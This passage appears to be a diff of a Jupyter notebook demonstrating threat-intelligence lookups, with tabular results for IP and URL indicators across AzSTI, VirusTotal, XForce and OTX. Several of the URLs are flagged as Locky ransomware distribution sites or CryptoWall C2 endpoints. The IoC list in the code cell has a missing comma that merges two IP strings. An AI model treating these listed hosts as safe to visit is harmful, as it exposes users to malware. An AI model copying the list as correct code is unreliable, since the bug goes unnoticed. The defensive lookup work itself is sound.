'ThreatSeverity': nan, 'Active': True, 'Description'...   \n41  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n42  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n43  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n44  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n45  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n46  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n47  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n48  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n49  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n50  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n51  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n52  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n53  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n54  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n55  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n56  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n57  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n58  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n59  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n60  {'Action': 'alert', 'ThreatType': 'Botnet', 'ThreatSeverity': nan, 'Active': True, 'Description'...   \n\n                                                                                              RawResult  \\\n0                                                                                                   NaN   \n1                                                                                                   NaN   \n2                                                                                                   NaN   \n3   {'IndicatorId': '2E9C9B5884CE9D1AAECA21C5EB772C30C3C84093C452AA038868AD4EEF50E83E', 'TimeGenerat...   \n4   {'IndicatorId': 'AA38B8D61F8587B779AABF6C4F2DBD226C7704600A5CBBB7779A7D0E7AFA05C4', 'TimeGenerat...   \n5   {'IndicatorId': 'E9DD356FF6855D16952067E4A35F0AAA1A8FF4E955E20B249131BD0EF7115A1E', 'TimeGenerat...   \n6   {'IndicatorId': '0612D0A787F9B2EA5FC1206C3727B3ADAD45D8AEDE2D90ADEC1C3B1590A609E0', 'TimeGenerat...   \n7   {'IndicatorId': '4DDD4BC9AD3844756B4DF7FAB23E9E9B917124D0A257BB405EF5715DEAA3D61B', 'TimeGenerat...   \n8   {'IndicatorId': 'CAFF80F6C8FD64CDA73AE68E382C6A7B6C94CA257C897324E6DB78D8C2106588', 'TimeGenerat...   \n9   {'IndicatorId': 'C72FAFC4A20054F73B343418F5EBE887610D257FFD51439392CC0376AB3B7173', 'TimeGenerat...   \n10  {'IndicatorId': '6E2A2B758395B8894E3B0D189870E155E0894D3801B951AE438D5C4A808F48E4', 'TimeGenerat...   \n11  {'IndicatorId': '30196A288FA811E8ACCCC84C434E3AD15F175B17BE2D4458DD3BC660073C1365', 'TimeGenerat...   \n12  {'IndicatorId': 'E75DD2AC6D75085D6CC7F441B2AFB121D77422CA708C04923CEB74C0A6245DBA', 'TimeGenerat...   \n13  {'IndicatorId': 'E91D764D861739FAEF7B106ED830D247262CDA4F2A8B312F1172E74D10CFD995', 'TimeGenerat...   \n14  {'IndicatorId': '0D2CC834B27D0EB8A4485B6B21295606F38B8DF06C0B2858D511157EE86AF219', 'TimeGenerat...   \n15  {'IndicatorId': 'D46F322358CB5FE7009A492564DD60C67E529A8439EA2B5F355385B9724F991C', 'TimeGenerat...   \n16  {'IndicatorId': '9570FF685A0289C703861F52B094C25A8D774570433A6562C85229A48DC826D3', 'TimeGenerat...   \n17  {'IndicatorId': '017D81A341E38E8355DA9EB6AAEE8AADC411ECE067DA84B586F59AC8EB3EDFAE', 'TimeGenerat...   \n18  {'IndicatorId': 'C771855E8F619F1852441349C314334193E7F45A8B4A9E5A20B0FAB9DD4DF783', 'TimeGenerat...   \n19  {'IndicatorId': 'C8133547D243769B2C38D4C2D03E90A14A340C7538BDAA21FE95BB2C906F350A', 'TimeGenerat...   \n20  {'IndicatorId': '3DFA877928D3B3E4D43696BF27ACA7098523C7429E43FD439368A4535FEB1E8E', 'TimeGenerat...   \n21  {'IndicatorId': '57DA6DAC917CF91DCF7ADEFFBC8AE94EE839C09FFD4103742D54E05A4E608FFB', 'TimeGenerat...   \n22  {'IndicatorId': '681C2296F85244215361CCFB1F0863DA7BF92C42BD091E29B4BFAFFD8BE46B12', 'TimeGenerat...   \n23  {'IndicatorId': '066D608C45B2A7CD63AD0F3286B56917E410546F6DF9A1E3A7018DCE33F29F66', 'TimeGenerat...   \n24  {'IndicatorId': 'AF0236BB54DB7C849FEF2D6A6E63143481214566E7666B1FF8D68B099C88DB37', 'TimeGenerat...   \n25  {'IndicatorId': 'AA67F6A7A899FAF845E959052C30C712DC96089309CF3F41CE24368E1B4E9F3D', 'TimeGenerat...   \n26  {'IndicatorId': 'FE9F08ED47A7E93E33C91A86D9B835E6A87DDE85660E19FCE35C254DDE95C641', 'TimeGenerat...   \n27  {'IndicatorId': 'AF4653DB24E9C45A116A6CD2B25D103D55A76457CEE9597205A3B3F4438F4CA1', 'TimeGenerat...   \n28  {'IndicatorId': '77C853D9EB8905812EEE44FCF5A7769F5E1F1CAC4CAE769FE7A33EBE5CC6EFB4', 'TimeGenerat...   \n29  {'IndicatorId': 'AE3584C5872970B9B16536D5F4A39B247D52F183A34B8D0D3A501FDE1D604057', 'TimeGenerat...   \n30  {'IndicatorId': '2B3D1B719533D10EF42E0BA1948BDE099A83C38BAF53E8369CB9651A890A0CD2', 'TimeGenerat...   \n31  {'IndicatorId': '3DE92C875100CC6465533A6767AEB58A202D7C347792D72F9D3B62BA93B17BD2', 'TimeGenerat...   \n32  {'IndicatorId': '7013C9E4A99F8869AF650FC36ACE5380C9037C3599C001B8906120A54CB6A6D2', 'TimeGenerat...   \n33  {'IndicatorId': '22E5A059B774EA99993C1C66A83F4001F8A238EF805D992782F6E84A4EA07066', 'TimeGenerat...   \n34  {'IndicatorId': '8A5D40A2674F98084398B2BFD97E33B39665F9B5FE98A485C1C149F363442679', 'TimeGenerat...   \n35  {'IndicatorId': '6A131B8B9E162BB546FBC24F0563A66A0DE69105B6614E881927BB537817345B', 'TimeGenerat...   \n36  {'IndicatorId': '7C5DAF47611B1F133E76B16145E46F30F269348A9C34C51AA7FFDC5FA8A7D231', 'TimeGenerat...   \n37  {'IndicatorId': '874BD11D0EBF97F31A3ACC1E5A28B3DF637D4817BFBAAC59C25350DEC7C78185', 'TimeGenerat...   \n38  {'IndicatorId': '7D0F24BEFB1FDFCE86BBE54EB05BAF62FAB93E5C0175E86EB6C5BF3F7E19AD23', 'TimeGenerat...   \n39  {'IndicatorId': 'D4EEBDC99B631C24A1445A428EB0CA4AC70809C2382521B12270237862FDFAC6', 'TimeGenerat...   \n40  {'IndicatorId': 'EA6FB2555F18DF5705C116F2BFFFF6F0AC23FE79CC1F70690CE696B15758F961', 'TimeGenerat...   \n41  {'IndicatorId': '50CBE99DC38594E814D47C2FC3E065E434297F92927C5642706DDEDEF9100A12', 'TimeGenerat...   \n42  {'IndicatorId': '87B84EEB12E45B0AC046178C4DF3BE304534E4404891AB3B670AB337CBDC6026', 'TimeGenerat...   \n43  {'IndicatorId': '12F46CB0B858952D8E9ABC29803373104673E7AD463AFA24C603B03CD8C14953', 'TimeGenerat...   \n44  {'IndicatorId': '4C007C39F6FEA5B88E1C456CB46929EAD4283B475689957EFF01C01395CE56A0', 'TimeGenerat...   \n45  {'IndicatorId': 'DDA218AD2568287384B6DD205ECA680D9CAFD5AE6B65B6821552AE11E12189D9', 'TimeGenerat...   \n46  {'IndicatorId': 'F3DB1ED9EF6CC0C468A309198BA2526152F52D87DB4D56FA56AB43B615149186', 'TimeGenerat...   \n47  {'IndicatorId': '2E36BE6DCEACAF7491EC274718845AA84A8AE2EAE025F16DFC87B0D2DEA040DD', 'TimeGenerat...   \n48  {'IndicatorId': '72AD9E8122E8CAA56BF8EB0642DAAE3DFCF8C869868623EBD7B9BA43E630062A', 'TimeGenerat...   \n49  {'IndicatorId': '9C3E69D4268C0BF3A77C166C0F05BFF8D09B007B75D01517C7A76EBD1334F22A', 'TimeGenerat...   \n50  {'IndicatorId': 'C735591AC4BB071A7FF91C7B6DFB716CB443F323B199C1E2D98E572D1E405665', 'TimeGenerat...   \n51  {'IndicatorId': '33C315E5D5D7C9466CB1F69146AD433928FF973890E2D3BDAF24C4A35A28F8AE', 'TimeGenerat...   \n52  {'IndicatorId': '1238F3DBC455768842E6EB9D6601C4C98FDE6A390BBC97B78BE7240F33D5F2D9', 'TimeGenerat...   \n53  {'IndicatorId': '334D78E4F5D02FD26CF6B0A0BCFEC0272006B94BDB2622F65DCD724787CBBDC7', 'TimeGenerat...   \n54  {'IndicatorId': '7A9D9126C9B0F56B76B874E5C36ED807320A91E5A566E717F30C6022E8B77644', 'TimeGenerat...   \n55  {'IndicatorId': 'C1D879AB9AF519E159684A8F592D5F8A035E7333A78BD612204ED0F1E1AE9DF4', 'TimeGenerat...   \n56  {'IndicatorId': '999F73C902C15F983A702972C30F23D1AD7DEE102BC82C4259AEAF4BB2FDA42A', 'TimeGenerat...   \n57  {'IndicatorId': 'A973BDB744EF6FC429B19E346C2A8B5EB42DBC292EB37C0BBE4F2CCED98F5F9E', 'TimeGenerat...   \n58  {'IndicatorId': '385F55DABB06B0B7C850AB889E516E2442A1ABF7268C6408B3F136F9DF402010', 'TimeGenerat...   \n59  {'IndicatorId': '70DD90016151A370513F852A93B5FCE681D9E01C200860BA6F12A50FABC5A702', 'TimeGenerat...   \n60  {'IndicatorId': '6422C91AB690A6BDF52A937BF1E03A4F802546D5D5EACA011157A98DB20F590C', 'TimeGenerat...   \n\n   Provider  \n0     AzSTI  \n1     AzSTI  \n2     AzSTI  \n3     AzSTI  \n4     AzSTI  \n5     AzSTI  \n6     AzSTI  \n7     AzSTI  \n8     AzSTI  \n9     AzSTI  \n10    AzSTI  \n11    AzSTI  \n12    AzSTI  \n13    AzSTI  \n14    AzSTI  \n15    AzSTI  \n16    AzSTI  \n17    AzSTI  \n18    AzSTI  \n19    AzSTI  \n20    AzSTI  \n21    AzSTI  \n22    AzSTI  \n23    AzSTI  \n24    AzSTI  \n25    AzSTI  \n26    AzSTI  \n27    AzSTI  \n28    AzSTI  \n29    AzSTI  \n30    AzSTI  \n31    AzSTI  \n32    AzSTI  \n33    AzSTI  \n34    AzSTI  \n35    AzSTI  \n36    AzSTI  \n37    AzSTI  \n38    AzSTI  \n39    AzSTI  \n40    AzSTI  \n41    AzSTI  \n42    AzSTI  \n43    AzSTI  \n44    AzSTI  \n45    AzSTI  \n46    AzSTI  \n47    AzSTI  \n48    AzSTI  \n49    AzSTI  \n50    AzSTI  \n51    AzSTI  \n52    AzSTI  \n53    AzSTI  \n54    AzSTI  \n55    AzSTI  \n56    AzSTI  \n57    AzSTI  \n58    AzSTI  \n59    AzSTI  \n60    AzSTI  "
+     },
+     "execution_count": 27,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "\r\n",
+    "ioc_ips = [\r\n",
+    "    \"51.75.29.61\",\r\n",
+    "    \"190.2.144.45\"\r\n",
+    "    \"52.183.120.194\",\r\n",
+    "    \"146.56.231.70\",\r\n",
+    "    \"1.2.3.4\",\r\n",
+    "    \"109.236.89.61\",\r\n",
+    "    \"1.2.3.5\",\r\n",
+    "]\r\n",
+    "\r\n",
+    "ti_lookup.lookup_iocs(data=ioc_ips, providers=\"AzSTI\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Multiple IoCs using all providers\n",
+    "Output sorted by IoC\n",
+    "\n",
+    "Note that these URLs were picked randomly from the TI databases of the three providers used. In most cases the IoC is found by only that provider, which "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:17.054530Z",
+     "start_time": "2019-09-25T04:58:07.306811Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>Ioc</th>\n      <th>IocType</th>\n      <th>SafeIoc</th>\n      <th>QuerySubtype</th>\n      <th>Provider</th>\n      <th>Result</th>\n      <th>Severity</th>\n      <th>Details</th>\n      <th>RawResult</th>\n      <th>Reference</th>\n      <th>Status</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>9</th>\n      <td>http://104.248.196.145/apache2</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>http://104.248.196.145/apache2</td>\n      <td>url</td>\n      <td>http://104.248.196.145/apache2</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>http://104.248.196.145/apache2</td>\n      <td>url</td>\n      <td>http://104.248.196.145/apache2</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>False</td>\n      <td>information</td>\n      <td>Not found.</td>\n      <td>&lt;Response [404]&gt;</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://104.248.196.145/apache2</td>\n      <td>404</td>\n    </tr>\n    <tr>\n      <th>5</th>\n      <td>http://104.248.196.145/apache2</td>\n      <td>url</td>\n      <td>http%3A%2F%2F104.248.196.145%2Fapache2</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://104.248.1...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2F104.248.196.145%2Fapache2/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>url</td>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>url</td>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'ajaraheritage.ge', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, '...</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://ajaraheritage.ge/g7cberv</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>http://ajaraheritage.ge/g7cberv</td>\n      <td>url</td>\n      <td>http%3A%2F%2Fajaraheritage.ge%2Fg7cberv</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'pulse_count': 2, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)', ...</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://ajaraheri...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fajaraheritage.ge%2Fg7cberv/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>http://append.pl/srh9xsz</td>\n      <td>url</td>\n      <td>http%3A%2F%2Fappend.pl%2Fsrh9xsz</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>warning</td>\n      <td>{'pulse_count': 1, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)'],...</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://append.pl...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fappend.pl%2Fsrh9xsz/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>http://append.pl/srh9xsz</td>\n      <td>url</td>\n      <td>http://append.pl/srh9xsz</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'append.pl', 'cats': {'Software / Hardware': True}, 'score': 1, 'categoryDesc...</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://append.pl/srh9xsz</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>http://append.pl/srh9xsz</td>\n      <td>url</td>\n      <td>http://append.pl/srh9xsz</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>0</th>\n      <td>http://append.pl/srh9xsz</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>http://businesstobuy.net</td>\n      <td>url</td>\n      <td>http%3A%2F%2Fbusinesstobuy.net</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'url_list', 'http_scans', 'screenshot']}</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://businesst...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fbusinesstobuy.net/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>http://businesstobuy.net</td>\n      <td>url</td>\n      <td>http://businesstobuy.net</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'businesstobuy.net', 'cats': {'Phishing URLs': True}, 'score': 10, 'categoryD...</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://businesstobuy.net</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>http://businesstobuy.net</td>\n      <td>url</td>\n      <td>http://businesstobuy.net</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'verbose_msg': 'Scan finished, scan information embedded in this object', 'response_code': 1, '...</td>\n      <td>{'scan_id': 'af9e75c955b06e2baf7c41de10afd2beb0f5ab53d5958690e2ee1ce30c6465cb-1608964829', 'reso...</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>2</th>\n      <td>http://businesstobuy.net</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>http://cheapshirts.us/zVnMrG.php</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>0</th>\n      <td>http://cheapshirts.us/zVnMrG.php</td>\n      <td>url</td>\n      <td>http://cheapshirts.us/zVnMrG.php</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'cheapshirts.us', 'cats': {'Shopping': True, 'Auctions / Classified Ads': Tru...</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://cheapshirts.us/zVnMrG.php</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>0</th>\n      <td>http://cheapshirts.us/zVnMrG.php</td>\n      <td>url</td>\n      <td>http://cheapshirts.us/zVnMrG.php</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'verbose_msg': 'Scan finished, scan information embedded in this object', 'response_code': 1, '...</td>\n      <td>{'scan_id': '154798b4220dfcc1d668b3a9fdcec6b384076db9e8be7d18d0747c327d5fca21-1575775323', 'reso...</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>0</th>\n      <td>http://cheapshirts.us/zVnMrG.php</td>\n      <td>url</td>\n      <td>http%3A%2F%2Fcheapshirts.us%2FzVnMrG.php</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'pulse_count': 7, 'names': ['CryptoWall Ransomware C2 URL blocklist (CW_C2_URLBL)', 'CryptoWall...</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://cheapshir...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fcheapshirts.us%2FzVnMrG.php/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>http://chinasymbolic.com/i9jnrc</td>\n      <td>url</td>\n      <td>http://chinasymbolic.com/i9jnrc</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'chinasymbolic.com', 'cats': {}, 'score': None, 'categoryDescriptions': {}}, ...</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://chinasymbolic.com/i9jnrc</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>6</th>\n      <td>http://chinasymbolic.com/i9jnrc</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>http://chinasymbolic.com/i9jnrc</td>\n      <td>url</td>\n      <td>http://chinasymbolic.com/i9jnrc</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'verbose_msg': 'Scan finished, scan information embedded in this object', 'response_code': 1, '...</td>\n      <td>{'scan_id': 'e56703fb78dcdd3229f2dad44779315924172b3a9815d137a8dbfbe27637e17b-1618935331', 'reso...</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>1</th>\n      <td>http://chinasymbolic.com/i9jnrc</td>\n      <td>url</td>\n      <td>http%3A%2F%2Fchinasymbolic.com%2Fi9jnrc</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'pulse_count': 2, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)', ...</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://chinasymb...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fchinasymbolic.com%2Fi9jnrc/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>url</td>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>3</th>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>url</td>\n      <td>http%3A%2F%2Fcic-integration.com%2Fhjy93JNBasdas</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>warning</td>\n      <td>{'pulse_count': 1, 'names': ['Locky Ransomware Distribution Sites URL blocklist (LY_DS_URLBL)'],...</td>\n      <td>{'sections': ['general', 'url_list', 'http_scans', 'screenshot'], 'indicator': 'http://cic-integ...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/url/http%3A%2F%2Fcic-integration.com%2Fhjy93JNBasda...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>7</th>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>url</td>\n      <td>http://cic-integration.com/hjy93JNBasdas</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'cic-integration.com', 'cats': {}, 'score': None, 'categoryDescriptions': {}}...</td>\n      <td>https://api.xforce.ibmcloud.com/url/http://cic-integration.com/hjy93JNBasdas</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>https://google.com</td>\n      <td>url</td>\n      <td>https://google.com</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'score': 0, 'cats': None, 'categoryDescriptions': None, 'reason': None, 'reasonDescription': 0,...</td>\n      <td>{'result': {'url': 'https://google.com', 'cats': {'Search Engines / Web Catalogues / Portals': T...</td>\n      <td>https://api.xforce.ibmcloud.com/url/https://google.com</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>4</th>\n      <td>https://google.com</td>\n      <td>url</td>\n      <td>NaN</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>0</td>\n      <td>Not found.</td>\n      <td>NaN</td>\n      <td>ThreatIntelligenceIndicator  | where TimeGenerated &gt;= datetime(2021-03-22T18:22:19.058146Z) | w...</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>https://google.com</td>\n      <td>url</td>\n      <td>https://google.com</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>False</td>\n      <td>information</td>\n      <td>No Content</td>\n      <td>&lt;Response [204]&gt;</td>\n      <td>https://www.virustotal.com/vtapi/v2/url/report</td>\n      <td>204</td>\n    </tr>\n    <tr>\n      <th>8</th>\n      <td>https://google.com</td>\n      <td>url</td>\n      <td>https%3A%2F%2Fgoogle.com</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'pulse_count': 0, 